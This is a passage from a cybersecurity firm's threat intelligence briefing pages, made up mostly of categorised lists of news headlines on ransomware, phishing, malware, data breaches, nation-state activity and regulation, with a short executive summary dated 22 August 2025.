TamperedChef Malware Disguised as Fake PDF Editors Steals Credentials and Cookies

Hackers Exploit Linux RAR Flaws in Phishing to Deploy VShell Backdoor

Bots/Botnets

GeoServer Exploits, PolarEdge, and Gayfemboy Push Cybercrime Beyond Traditional Botnets

IoT under siege: The return of the Mirai-based Gayfemboy Botnet

Mobile

New Android Trojan Variant Expands with Ransomware Tactics - Infosecurity Magazine

iPhone Users 20% More Likely to Fall for Scams Than Android, Study Shows

Anatsa Android Banking Trojan Now Targeting 830 Financial Apps - SecurityWeek

Hook Android Trojan Delivers Ransomware-Style Attacks

Google Deletes Millions of Android Apps After Malware Discovery

Free VPN apps found to have ties with Russia and China – and they're hiding in Google and Apple’s app stores | TechRadar

Threat Actors Adapting Android Droppers Even to Deploy Simple Malware to Stay Future-Proof

Google to Verify All Android Developers in 4 Countries to Block Malicious Apps

Russia orders state-backed MAX messenger app, a WhatsApp rival, pre-installed on phones and tablets | Reuters

Android.Backdoor.916.origin malware targets Russian business executives

New Android malware poses as antivirus from Russian intelligence agency

Denial of Service/DoS/DDoS

Global DDoS attacks exceed 8M amid geopolitical tensions

Telco DDoS threat on the rise amid geopolitical unrest | TelecomTV

Arch Linux remains under attack as DDoS enters week 2 - here's a workaround | ZDNET

Internet of Things – IoT

IoT under siege: The return of the Mirai-based Gayfemboy Botnet

Camera Hacking — America’s Cyber Defense Agency Issues Warning

Cyberterrorism and the Connected Car: The Growing Threat To Automotive Security | SC Media UK

IoT security challenges, issues and best practices - Security Boulevard

The Risk of Consumer Devices in the Hybrid Workforce

Your car could be at risk – new Flipper Zero craze sees car thieves use cheap hacking device, and there's no easy fix | TechRadar

Security researcher maps hundreds of TeslaMate servers spilling Tesla vehicle data | TechCrunch

Data Breaches/Leaks

Human risk and Gen AI-driven data loss top CISO concerns - BetaNews

Hundreds of Salesforce customers impacted by attack spree linked to third-party AI agent | CyberScoop

Google Breach Exposes 2.5 Billion Gmail Accounts to Phishing Attacks

User data posted on the dark web after massive telecom hack in Europe, should you worry? - PhoneArena

Hackers claim millions of PayPal accounts leaked while experts say the data looks suspiciously cheap and possibly stolen from old infostealer logs | TechRadar

DOGE employees uploaded Social Security database to ‘vulnerable’ cloud, agency whistleblower says | FedScoop

Data Breach Strikes Criminal Records Service Firm APCS | SC Media UK

74% of companies admit insecure code caused a security breach | IT Pro

Google warns Salesloft breach impacted some Workspace accounts

1,000+ Devs Lose Their Secrets to an AI-Powered Stealer

89 Million Steam Accounts Compromised: Change Your Password Now - Security Boulevard

Farmers Insurance data breach impacts 1.1M people after Salesforce attack

Auchan retailer data breach impacts hundreds of thousands of customers

Leaked Intel database reveals how a simple login flaw exposed 270,000 employees and shattered confidence in corporate digital defenses | TechRadar

Tencent Cloud leaves critical data open for months | Cybernews

IT system supplier cyberattack impacts 200 municipalities in Sweden

MoD staff were warned not to share hidden data before Afghan leak - BBC News

TransUnion says hackers stole 4.4 million customers' personal information | TechCrunch

Discord hackers claim to have leaked billions of messages as millions of users targeted - here's what we know | TechRadar

Government faces questions after review of 11 major UK data breaches | Data protection | The Guardian

Nissan confirms design studio data breach claimed by Qilin ransomware

iiNet Data Breach Exposes 280,000 Customers' Emails and Addresses

Church of England abuse victims exposed by lawyer's email • The Register

90K exposed after sleep therapy provider data breach | Cybernews

Security researcher maps hundreds of TeslaMate servers spilling Tesla vehicle data | TechCrunch

Organised Crime & Criminal Actors

Dark Reading Confidential: Guided Tour of the Dark Web

bne IntelliNews - Cyber criminals steal $339mn from thousands of victims in Zambia, Angola and Ivory Coast

FBI, Dutch cops seize fake ID marketplace, servers • The Register

A hacker used AI to automate an ‘unprecedented’ cybercrime spree, Anthropic says – DataBreaches.Net

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners

Crypto Companies Freeze $47m in Romance Baiting Funds - Infosecurity Magazine

Insider Risk and Insider Threats

Human risk and Gen AI-driven data loss top CISO concerns - BetaNews

How social engineering is the weakest link in cyber defence

A disgruntled worker built his own kill-switch malware to take down his former employer - and it didn't pay off | TechRadar

Chinese Developer Jailed for Deploying Malicious Code at US Company - Infosecurity Magazine

Treasury sanctions North Korea IT worker scheme facilitators and front organizations | CyberScoop

Can We Really Eliminate Human Error in Cybersecurity? - Security Boulevard

When ransomware hits home: putting your people first | TechRadar

Building Human Firewalls: Key to Combating Cyber Threats

Another US Navy Sailor Was Just Busted Spying for China - The National Interest

Insurance

Cyber Insurers May Limit Payouts for Breaches via Flaws

Cyber Outlook Report Finds Gaps, Outlines Holistic Approach to Protections

Cyber insurance still has a problem with modelling - Tech Monitor

Supply Chain and Third Parties

Hundreds of Salesforce customers impacted by attack spree linked to third-party AI agent | CyberScoop

Murky Panda hackers exploit cloud trust to hack downstream customers

5 Practices to Ensure Your Ecosystem Is Cyber-Secure

IT system supplier cyberattack impacts 200 municipalities in Sweden

Ransomware Gangs Are Bleeding the Healthcare Supply Chain | MSSP Alert

When Partners Become Cybersecurity Risks

Cloud/SaaS

Murky Panda hackers exploit cloud trust to hack downstream customers

Ransomware Actor Deletes Data and Backups Post-Exfiltration on Azure - Infosecurity Magazine

Silk Typhoon Attacks North American Orgs in the Cloud

DOGE employees uploaded Social Security database to ‘vulnerable’ cloud, agency whistleblower says | FedScoop

Tencent Cloud leaves critical data open for months | Cybernews

Fake IT Support Attacks Hit Microsoft Teams - Infosecurity Magazine

Chinese Hackers Murky, Genesis, and Glacial Panda Escalate Cloud and Telecom Espionage

Attackers Abuse Virtual Private Servers to Compromise SaaS Accounts - Infosecurity Magazine

How much do you trust your cloud? Hackers exploit weakness to target customers - here's what we know | TechRadar

Rising Cloud Security Threats: Exploits, Breaches, and Defenses

ScreenConnect admins targeted with spoofed login alerts - Help Net Security

AWS Trusted Advisor Tricked Into Showing Unprotected S3 Buckets as Secure - SecurityWeek

Online PDF Editors Safe to Use? Detailed Analysis of Security Risks Associated With It

Outages

Microsoft working on fix for ongoing Outlook email issues

Identity and Access Management

Compromised at the Core: Why Identity Remains Cyber’s Biggest Flaw | SC Media UK

Report declares 'identity crisis' amid rising login attacks • The Register

Identity Security Silos: An Attacker's Best Ally

Encryption

Quantum Computing Threatens Encryption: Shift to Post-Quantum Crypto

Linux and Open Source

Arch Linux remains under attack as DDoS enters week 2 - here's a workaround | ZDNET

Passwords, Credential Stuffing & Brute Force Attacks

Compromised at the Core: Why Identity Remains Cyber’s Biggest Flaw | SC Media UK

Hackers Can Exfiltrate Windows Secrets and Credentials Silently by Evading EDR Detection

Report declares 'identity crisis' amid rising login attacks • The Register

Billions of Gmail users advised to change passwords | The Independent

New research finds AI agents exploiting valid credentials to bypass traditional security controls in enterprises | TechRadar

Enterprise passwords becoming even easier to steal and abuse | CSO Online

Everyone should know which passwords suck. Do you? | PCWorld

Hackers are looking to steal Microsoft logins using some devious new tricks - here's how to stay safe | TechRadar

89 Million Steam Accounts Compromised: Change Your Password Now - Security Boulevard

Password managers vulnerable: 40 million users at risk of stolen data | PCWorld

Social Media

Meta might be secretly scanning your phone's camera roll - how to check and turn it off | ZDNET

Social media apps that aggressively harvest user data - Help Net Security

Regulations, Fines and Legislation

CIISec: Most Security Professionals Want Stricter Regulations - Infosecurity Magazine

Cybersecurity Obligations Under EU NIS 2 Directive

Regulatory compliance: Act now | TechRadar

Attacks on VPNs are unjustified and dangerous – and it's not how we achieve online safety | Tom's Guide

FCC Bars China from Undersea Cables to Combat Espionage Risks

ENISA to manage €36M EU Cybersecurity Reserve ...

4chan will refuse to pay daily UK fines, its lawyer tells BBC

Gaps in California Privacy Law: Brokers Ignore Requests

Apple warns UK against introducing tougher tech regulation - BBC News

Non-Compliance with CMMC Could Put Your DoD Contracts at Risk | Offit Kurman - JDSupra

Models, Frameworks and Standards

Cybersecurity Obligations Under EU NIS 2 Directive

ENISA to manage €36M EU Cybersecurity Reserve ...

NIST Releases Control Overlays to Manage Cybersecurity Risks in Use and Developments of AI Systems

Regulatory compliance: Act now | TechRadar

Hungary extends cybersecurity registration obligations for entities falling under NIS2

ENISA to Coordinate €36m EU-Wide Incident Response Scheme - Infosecurity Magazine

Beyond GDPR security training: Turning regulation into opportunity

Non-Compliance with CMMC Could Put Your DoD Contracts at Risk | Offit Kurman - JDSupra

Data Protection

Gaps in California Privacy Law: Brokers Ignore Requests

Careers, Working in Cyber and Information Security

83% of CISOs say staff shortage is major issue for defense | CSO Online

The Career Delta: Navigating AI, Cybersecurity and Change

Cybersecurity Workforce Trends in 2025 - Skills Gap, Diversity and SOC Readiness

Law Enforcement Action and Take Downs

A disgruntled worker built his own kill-switch malware to take down his former employer - and it didn't pay off | TechRadar

Interpol cybercrime crackdown in Africa leads to the arrest of over 1,200 suspects - ABC News

Interpol-led crackdown disrupts cybercrime networks in Africa that caused $485 million in losses | CyberScoop

Operation Serengeti 2.0: INTERPOL nabs 1,209 cybercriminals in Africa, seizes $97M

FCC removes 1,200 voice providers from telephone networks in major robocall crackdown | CyberScoop

FBI, Dutch cops seize fake ID marketplace, servers • The Register

Yemen Cyber Army hacker jailed after stealing millions of people’s data • Graham Cluley

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

FCC Bars China from Undersea Cables to Combat Espionage Risks

Chinese Hackers Murky, Genesis, and Glacial Panda Escalate Cloud and Telecom Espionage

Nation State Actors

How Boards Can Prepare for Increasing Nation-State Cyber Threats

China

Murky Panda hackers exploit cloud trust to hack downstream customers

Chinese Hackers Murky, Genesis, and Glacial Panda Escalate Cloud and Telecom Espionage

Silk Typhoon Attacks North American Orgs in the Cloud

Free VPN apps found to have ties with Russia and China – and they're hiding in Google and Apple’s app stores | TechRadar

UK and 12 allies issue warning over Chinese cyber attacks on ‘critical sectors’ | The Standard

Global Salt Typhoon hacking campaigns linked to Chinese tech firms

Global DDoS attacks exceed 8M amid geopolitical tensions

Telco DDoS threat on the rise amid geopolitical unrest | TelecomTV

Chinese Telecom Hackers Strike Worldwide - GovInfoSecurity

Salt Typhoon Exploits Cisco, Ivanti, Palo Alto Flaws to Breach 600 Organizations Worldwide

Another US Navy Sailor Was Just Busted Spying for China - The National Interest

Silk Typhoon hackers hijack network captive portals in diplomat attacks

Chinese Developer Jailed for Deploying Malicious Code at US Company - Infosecurity Magazine

FCC Bars China from Undersea Cables to Combat Espionage Risks

Russia

Putin’s New Cyber Empire | Foreign Affairs

Free VPN apps found to have ties with Russia and China – and they're hiding in Google and Apple’s app stores | TechRadar

US DoD reportedly relies on utility written by Russian • The Register

Russia orders state-backed MAX messenger app, a WhatsApp rival, pre-installed on phones and tablets | Reuters

New Android malware poses as antivirus from Russian intelligence agency

Android.Backdoor.916.origin malware targets Russian business executives

North Korea

Treasury sanctions North Korea IT worker scheme facilitators and front organizations | CyberScoop

Tools and Controls

Incident response planning emerges as a key cybersecurity control in reducing cyber risk: Marsh McLennan Cyber Risk Intelligence Center report

Tabletop drills cut cyber event likelihood by 13% – report - CIR Magazine

Compromised at the Core: Why Identity Remains Cyber’s Biggest Flaw | SC Media UK

Hackers Can Exfiltrate Windows Secrets and Credentials Silently by Evading EDR Detection

Ransomware Actor Deletes Data and Backups Post-Exfiltration on Azure - Infosecurity Magazine

Cyber Insurers May Limit Payouts for Breaches via Flaws

Cyber insurance still has a problem with modelling - Tech Monitor

74% of companies admit insecure code caused a security breach | IT Pro

Cyber security response rising up the agenda

Public sector cyber leaders are tired of clunky, outdated tools | IT Pro

Surge in coordinated scans targets Microsoft RDP auth servers

ENISA to Coordinate €36m EU-Wide Incident Response Scheme - Infosecurity Magazine

Report declares 'identity crisis' amid rising login attacks • The Register

Attackers Abuse Virtual Private Servers to Compromise SaaS Accounts - Infosecurity Magazine

The do’s and don’ts of vibe coding - Fast Company

The perils of vibe coding

The Biggest Technology Risk to Organizations is Failing to Plan for Cybersecurity Chaos - Security Boulevard

10 common file-sharing security risks and how to prevent them | TechTarget

Free VPN apps found to have ties with Russia and China – and they're hiding in Google and Apple’s app stores | TechRadar

Attacks on VPNs are unjustified and dangerous – and it's not how we achieve online safety | Tom's Guide

Identity Security Silos: An Attacker's Best Ally

AWS Trusted Advisor Tricked Into Showing Unprotected S3 Buckets as Secure - SecurityWeek

1,000+ Devs Lose Their Secrets to an AI-Powered Stealer

Why SIEM Rules Fail and How to Fix Them: Insights from 160 Million Attack Simulations

How Bug Bounty Programs Can Help Combat Ransomware Attacks - The Daily Upside

Google previews cyber ‘disruption unit’ as US government, industry weigh going heavier on offense | CyberScoop

Google is getting ready to 'hack back' as US considers shifting from cyber defense to offense — new 'Scam Farms' bill opens up new retaliatory hacking actions | Tom's Hardware

Password managers vulnerable: 40 million users at risk of stolen data | PCWorld

The 5 Golden Rules of Safe AI Adoption

Other News

KnowBe4 Report Reveals Global Financial Sector Faces Unprecedented Cyber Threat Surge - IT Security Guru

Hackers are looking to steal Microsoft logins using some devious new tricks - here's how to stay safe | TechRadar

Nevada state offices close after wide-ranging 'network security incident' | Reuters

Blistering Wyden letter seeks review of federal court cybersecurity, citing ‘incompetence,’ ‘negligence’ | CyberScoop

Public sector cyber leaders are tired of clunky, outdated tools | IT Pro

Mastercard: How cybersecurity is changing everything

Surge in coordinated scans targets Microsoft RDP auth servers

Threat Actors Weaponizing Windows Scheduled Tasks to Establish Persistence Without Requiring Extra Tools

Why satellite cybersecurity threats matter to everyone - Help Net Security

Space assets are under silent siege. Cybersecurity can’t be an afterthought - SpaceNews

The energy sector has no time to wait for the next cyberattack - Help Net Security

Maritime cybersecurity is the iceberg no one sees coming - Help Net Security

Vulnerability Management

Cyber Insurers May Limit Payouts for Breaches via Flaws

74% of companies admit insecure code caused a security breach | IT Pro

AI Security Map: Linking AI vulnerabilities to real-world impact - Help Net Security

The Vulnerability Management Lifecycle Explained: A Step-by-Step Guide for Security Teams - ActiveState

Microsoft Delays Windows 10 Extended Security Updates Rollout

How Bug Bounty Programs Can Help Combat Ransomware Attacks - The Daily Upside

Vulnerabilities

Citrix NetScaler customers hit by third actively exploited zero-day vulnerability since June | CyberScoop

Over 28,000 Citrix instances remain exposed to critical RCE flaw CVE-2025-7775

Salt Typhoon Exploits Cisco, Ivanti, Palo Alto Flaws to Breach 600 Organizations Worldwide

ReVault Flaw Exposed Millions of Dell Laptops

CISA Adds Three Exploited Vulnerabilities to KEV Catalog Affecting Citrix and Git

Docker Desktop on Windows contains a critical flaw | Cybernews

Microsoft Delays Windows 10 Extended Security Updates Rollout

Docker fixes critical Desktop flaw allowing container escapes

Git vulnerability leading to RCE is being exploited by attackers (CVE-2025-48384) - Help Net Security

Organizations Warned of Exploited Git Vulnerability - SecurityWeek

Researchers warn of security flaws in AI-powered browsers | TechSpot

300k+ Plex Media Server instances still vulnerable to attack via CVE-2025-34158 - Help Net Security

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 24/08/2025 Black Arrow Admin 24/08/2025

Black Arrow Cyber Threat Intelligence Briefing 22 August 2025

Black Arrow Cyber Threat Intelligence Briefing 22 August 2025:

-85% of Organisations Approach Cyber Security Reactively

-25% of Security Leaders Replaced After Ransomware Attack

-Iranian Threat Actor Group ‘MuddyWater’ Targeting CFOs Worldwide

-Canadian Financial Regulator Hacked, Exposing Personal Data from Member Organisations

-‘Impersonation as a Service’ the Next Big Thing in Cybercrime

-URL-Based Threats Become a Go-To Tactic for Cybercriminals

-How Evolving Remote Access Trojans (RATs) Are Redefining Enterprise Security Threats

-How GenAI Complacency is Becoming Cyber Security’s Silent Crisis

-Fake Employees Pose Real Security Risks

-AI Gives Ransomware Gangs a Deadly Upgrade

-DORA: Six Months into a Resilience Revolution

-Why Your Security Culture is Critical to Mitigating Cyber Risk

Executive Summary

This week we start with a look at how organisations react to cyber incidents: studies show that most organisations prioritise their security after they have been attacked, and one in four CISOs lose their job after a ransomware attack even when the incident stems from factors outside their direct control. We discuss emerging attacks, including those focused on CFOs and Regulators, and where English language speakers are hired to help in social engineering attacks. We also spotlight attacks using remote access trojans, and the risks of complacency when using AI while AI itself continues to boost attackers.

Looking ahead, Gartner warns that by 2028 up to one in four job candidates could be artificially generated with associated security risks. Focusing on solutions to address cyber risks, we look at the impact of the EU’s DORA law that aims to build better resilience in the financial services sector. Finally, on the basis that the majority of cyber attacks involve people, including the social engineering attacks referred to earlier, we look at how a security culture is critical to helping to protect your organisation.

Governance, Risk and Compliance

25% of security leaders replaced after ransomware attack | CSO Online

Weak alerting and slipping prevention raise risk levels for CISOs - Help Net Security

Why Your Security Culture is Critical to Mitigating Cyber Risk

UK firms at risk of more cyber incidents - here's how to stay protected | TechRadar

85% of Organizations Approach Cybersecurity Reactively | Security Magazine

C-Suite Lessons From Joe Sullivan And The Uber Data Breach

Employee distraction is a bigger risk than attack sophistication - BetaNews

UK cyber leaders feel impact of Trump cutbacks | Computer Weekly

Threats

Ransomware, Extortion and Destructive Attacks

25% of security leaders replaced after ransomware attack | CSO Online

Ransomware is on the rise: Global cybercrime hits new highs - Digital Journal

February ransomware attacks hit record high as ThreatDown reports 25% annual surge - SiliconANGLE

Teen hackers aren't the problem. They're the wake-up call | Computer Weekly

AI gives ransomware gangs a deadly upgrade - Help Net Security

Can cyber group takedowns last? | IT Pro

Microsoft Windows Vulnerability Exploited to Deploy PipeMagic RansomExx Malware

Ransomware gang masking PipeMagic backdoor as ChatGPT desktop app: Microsoft | The Record from Recorded Future News

Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware | Trend Micro (US)

Insurers face challenges with UK ransomware ban

Scattered Spider affiliate given 10 year sentence, ordered to pay $13 million in restitution | The Record from Recorded Future News

Europol Says Qilin Ransomware Reward Fake - SecurityWeek

Europe's Ransomware Surge Is a Warning Shot for US Defenders

U.S. Sanctions Garantex and Grinex Over $100M in Ransomware-Linked Illicit Crypto Transactions

U.S. seizes $2.8 million in crypto from Zeppelin ransomware operator

Ransomware Victims

UK telecom provider Colt says outages were due to cyber incident | The Record from Recorded Future News

Warlock claims ransomware attack on network services firm Colt | Computer Weekly

Colt Telecom attack claimed by WarLock ransomware, data up for sale

Accounting Firm Pays Feds $175K for HIPAA Ransomware Breach

Drug development company Inotiv reports ransomware attack to SEC | The Record from Recorded Future News

Ransomware attack at DaVita impacted 2.7 million people, US health dept website shows - CNA

Phishing & Email Based Attacks

Phishing Campaign Exploits Microsoft ADFS to Evade Security

APT MuddyWater Attacking CFOs Leveraging OpenSSH, Enables RDP, and Scheduled Task

Hackers steal Microsoft logins using legitimate ADFS redirects

2.5 billion Gmail users at risk after Google's databases were hacked | PCWorld

URL-based threats become a go-to tactic for cybercriminals - Help Net Security

Study: Phishing always works, despite cyber training | Cybernews

Nearly half of Americans still reuse passwords despite phishing risks - BetaNews

Warning: Watch Out for This Japanese Character in Your Booking.com Email

Cybercriminals Attack VPS to Access Business Email Systems | Security Magazine

Scam Emails Are Getting Smarter—Would You Fall for These Ones?

Other Social Engineering

North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms

Fake Employees Pose Real Security Risks

Zero-day Clickjacking exploit impacts several password managers - gHacks Tech News

Fake It Til You Make It: The New Age of Employment Fraud | MSSP Alert

URL-based threats become a go-to tactic for cybercriminals - Help Net Security

Hackers Weaponize QR Codes in New ‘Quishing’ Attacks - Infosecurity Magazine

Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages

Beyond romance fraud: The rising threat of social media scams | TechRadar

Think before you Click(Fix): Analyzing the ClickFix social engineering technique | Microsoft Security Blog

'Impersonation as a service' next big thing in cybercrime • The Register

Workday Confirms Social Engineering Cyberattack Exposing Contact Data

Workday Breach Linked to ShinyHunters Salesforce Attacks

Massive Allianz Life data breach impacts 1.1 million people

Workday Discloses Data Breach Following CRM-Targeted Social Engineering Attack - IT Security Guru

Scam Emails Are Getting Smarter—Would You Fall for These Ones?

Scammers Are Now Impersonating Cyber Crime Agents

Fraud, Scams and Financial Crime

Fake It Til You Make It: The New Age of Employment Fraud | MSSP Alert

Beyond romance fraud: The rising threat of social media scams | TechRadar

Authorized Push Payment Fraud a National Security Risk to UK - Infosecurity Magazine

How employees are using AI to fudge receipts for business expenses - and how to spot them | Daily Mail Online

Scam Emails Are Getting Smarter—Would You Fall for These Ones?

WhatsApp Privacy Myths: Encryption Flaws, Scams, and Signal Alternatives

Scammers Are Now Impersonating Cyber Crime Agents

Experts Warn Athletes Against Public Venmo Accounts

Artificial Intelligence

How GenAI complacency is becoming cybersecurity’s silent crisis | TechRadar

Fake It Til You Make It: The New Age of Employment Fraud | MSSP Alert

Fake Employees Pose Real Security Risks

AI gives ransomware gangs a deadly upgrade - Help Net Security

4 in 5 CISOs say DeepSeek must be regulated - Data Centre & Network News

URL-based threats become a go-to tactic for cybercriminals - Help Net Security

Man-in-the-Prompt: The invisible attack threatening ChatGPT and other AI systems

This Authentication Method Is Horribly Insecure—AI Just Made It Worse

78% of Businesses Are Investing in GenAI -- but Just 36% have the Infrastructure to Support It, New Unisys Study Finds

The era of AI hacking has arrived

The 'shadow AI economy' is booming: Workers at 90% of companies say they use chatbots, but most of them are hiding it from IT | Fortune

CISOs need to think about risks before rushing into AI - Help Net Security

Hackers Abuse Vibe Coding Service to Build Malicious Sites

Easy ChatGPT Downgrade Attack Undermines GPT-5 Security

New NIST guide explains how to detect morphed images - Help Net Security

Flaw in Lenovo’s customer service AI chatbot could let hackers run malicious code, breach networks | IT Pro

Scammers are sneaking into Google's AI summaries to steal from you - how to spot them | ZDNET

How web scraping actually works - and why AI changes everything | ZDNET

Microsoft mum about M365 Copilot on-demand security bypass • The Register

Claude can now stop conversations - for its own protection, not yours | ZDNET

Hundreds of thousands of Grok chats exposed in Google results - BBC News

Perplexity's Comet AI browser could expose your data to attackers - here's how | ZDNET

How employees are using AI to fudge receipts for business expenses - and how to spot them | Daily Mail Online

Agentic AI’s security risks are challenging, but the solutions are surprisingly simple | TechRadar

The invisible battlefield: Good AI vs Bad AI in the evolving cybersecurity landscape | TechRadar

Malware

How Evolving RATs Are Redefining Enterprise Security Threats

Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages

Microsoft Windows Vulnerability Exploited to Deploy PipeMagic RansomExx Malware

Ransomware gang masking PipeMagic backdoor as ChatGPT desktop app: Microsoft | The Record from Recorded Future News

Budget Mac.c Infostealer Rivals AMOS Amid 101% macOS Threat Surge

New FireWood Malware Attacking Linux Systems to Execute Commands and Exfiltrate Sensitive Data

XenoRAT malware campaign hits multiple embassies in South Korea

USB Malware Campaign Spreads Cryptominer Worldwide - Infosecurity Magazine

Legitimate Chrome VPN Extension Turns to Browser Spyware - Infosecurity Magazine

New GodRAT Trojan Targets Trading Firms Using Steganography and Gh0st RAT Code

Hundreds Targeted in New Atomic macOS Stealer Campaign - SecurityWeek

Developer jailed for malware that took out his employer • The Register

“Rapper Bot” malware seized, alleged developer identified and charged

Solana malware targeting Russian crypto developers • The Register

Mobile

UK backs down in Apple privacy row, US says - BBC News

Android VPN apps used by millions are covertly connected AND insecure - Help Net Security

Apple Patches CVE-2025-43300 Zero-Day in iOS, iPadOS, and macOS Exploited in Targeted Attacks

Apple addressed the seventh actively exploited zero-day

Novel 5G Attack Bypasses Need for Malicious Base Station - SecurityWeek

ERMAC Android malware source code leak exposes banking trojan infrastructure

How To Find And Remove Spyware From Your Android Phone

Denial of Service/DoS/DDoS

Internet-wide Vulnerability Enables Giant DDoS Attacks

“Rapper Bot” malware seized, alleged developer identified and charged

'Rapper Bot' hit the Pentagon in at least 3 cyberattacks | DefenseScoop

Internet of Things – IoT

Hackers can abuse IPv6 to hijack networks | Cybernews

System Shocks? EV Smart Charging Tech Poses Cyber-Risks

Your smart home device just got a performance and security boost for free | ZDNET

Data Breaches/Leaks

2.5 billion Gmail users at risk after Google's databases were hacked | PCWorld

Over 190 million hit in UnitedHealth data breach — confirmed largest in history | Tom's Guide

Hacker Offers to Sell 15.8 Million Plain-Text PayPal Credentials On Dark Web Forum

Canadian Financial Regulator Hacked, Exposing Personal Data from Membe - Infosecurity Magazine

Workday Confirms Social Engineering Cyberattack Exposing Contact Data

Thousands of guests at Italian hotels hit in wide-ranging cyberattack - here's what we know | TechRadar

Air France and KLM warn customers of new data breach | Fox News

4 cyberattacks that rocked global telecoms | Capacity Media

Dozens more Afghan relocation data breaches uncovered by BBC - BBC News

Colt Telecom attack claimed by WarLock ransomware, data up for sale

Millions Allegedly Affected in Allianz Insurance Breach

Orange Belgium's 850K mega-breach raises fraud fears • The Register

Elon Musk’s xAI Published Hundreds Of Thousands Of Grok Chatbot Conversations

Intel Employee Data Exposed by Vulnerabilities - SecurityWeek

Australian ISP iiNet Suffers Breach of 280,000+ Records - Infosecurity Magazine

TPG Telecom estimates 280K affected by subsidiary breach • The Register

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

USB Malware Campaign Spreads Cryptominer Worldwide - Infosecurity Magazine

Lazarus strikes again? $23m theft topples crypto platform

Lykke Exchange Shuts Down After $23M Lazarus Group Hack

US seizes $2.8 million in crypto from Zeppelin ransomware operator

Nebraska man gets 1 year in prison for $3.5M cryptojacking scheme

Solana malware targeting Russian crypto developers • The Register

Insider Risk and Insider Threats

Fake It Til You Make It: The New Age of Employment Fraud | MSSP Alert

Fake Employees Pose Real Security Risks

North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms

Study: Phishing always works, despite cyber training | Cybernews

Developer jailed for malware that took out his employer • The Register

KnowBe4 Finds Top Cybersecurity Risk is Employee Distraction, Not Threat Sophistication - IT Security Guru

How employees are using AI to fudge receipts for business expenses - and how to spot them | Daily Mail Online

Soldier admits handing over sensitive information to person he thought was foreign agent | RNZ News

Insurance

Insurers face challenges with UK ransomware ban

Is personal cyber insurance at an inflection point? - Insurance Post

Logistics giant's UK arm returns to profit - helped by insurance settlement after cybersecurity incident | Insider Media

Cloud/SaaS

Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems

Microsoft investigates outage impacting Copilot, Office.com

Outages

Microsoft investigates outage impacting Copilot, Office.com

Colt Customers Face Prolonged Outages After Major Cyber Incident - Infosecurity Magazine

Identity and Access Management

Phishing Campaign Exploits Microsoft ADFS to Evade Security

Hackers steal Microsoft logins using legitimate ADFS redirects

Encryption

UK Backs Down On Apple Encryption Backdoor—But The Secret Deal Raises New Questions | Techdirt

US spy chief Gabbard says UK agreed to drop 'backdoor' mandate for Apple | Reuters

The Online Safety Act isn't just about age verification – end-to-end encryption is also at risk | TechRadar

An explanation of quantum key distribution | TechTarget

Trump admin says it convinced UK to drop demand for Apple backdoor - Ars Technica

UK Drops Demand for iCloud Backdoor for American Users' Data

FTC warns US Big Tech: Don’t bend to foreign censors • The Register

WhatsApp Privacy Myths: Encryption Flaws, Scams, and Signal Alternatives

Russia Is Cracking Down on End-to-End Encrypted Calls | WIRED

Linux and Open Source

Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems

New FireWood Malware Attacking Linux Systems to Execute Commands and Exfiltrate Sensitive Data

Passwords, Credential Stuffing & Brute Force Attacks

Nearly half of Americans still reuse passwords despite phishing risks - BetaNews

Password Party’s Over: Nearly 50% of Americans Continue to Re-use Passwrds Despite Phishing Attacks on the Rise

Zero-day Clickjacking exploit impacts several password managers - gHacks Tech News

Password Managers Vulnerable to Data Theft via Clickjacking - SecurityWeek

Social Media

Beyond romance fraud: The rising threat of social media scams | TechRadar

Training, Education and Awareness

Study: Phishing always works, despite cyber training | Cybernews

Employee distraction is a bigger risk than attack sophistication - BetaNews

KnowBe4 Finds Top Cybersecurity Risk is Employee Distraction, Not Threat Sophistication - IT Security Guru

Almost all banks mandate cyber security training - Risk.net

Regulations, Fines and Legislation

US spy chief Gabbard says UK agreed to drop 'backdoor' mandate for Apple | Reuters

The UK Online Safety Act could kill the internet as we know it.

Children’s exposure to porn higher than before 2023 Online Safety Act, poll finds | Pornography | The Guardian

DORA: six months into a resilience revolution | TechRadar

The Online Safety Act isn't just about age verification – end-to-end encryption is also at risk | TechRadar

US Director of National Intelligence Claims U.K. Has Retreated from iCloud Backdoor Demands – Pixel Envy

Trump admin says it convinced UK to drop demand for Apple backdoor - Ars Technica

FTC warns US Big Tech: Don’t bend to foreign censors • The Register

UK Backs Down On Apple Encryption Backdoor—But The Secret Deal Raises New Questions | Techdirt

Insurers face challenges with UK ransomware ban

Britons back Online Safety Act’s age checks, but are sceptical of effectiveness and unwilling to share ID | Ipsos

EU: ENISA Guidelines on Compliance with NIS 2 Directive Published | DLA Piper - JDSupra

EU’s Cyber Resilience Act: As Deadline Looms, Are You Ready For It? - EE Times

How VPNs are helping people evade increased censorship - and much more | ZDNET

UK cyber leaders feel impact of Trump cutbacks | Computer Weekly

The EU NIS2 Directive and intra-group IT services | Hogan Lovells - JDSupra

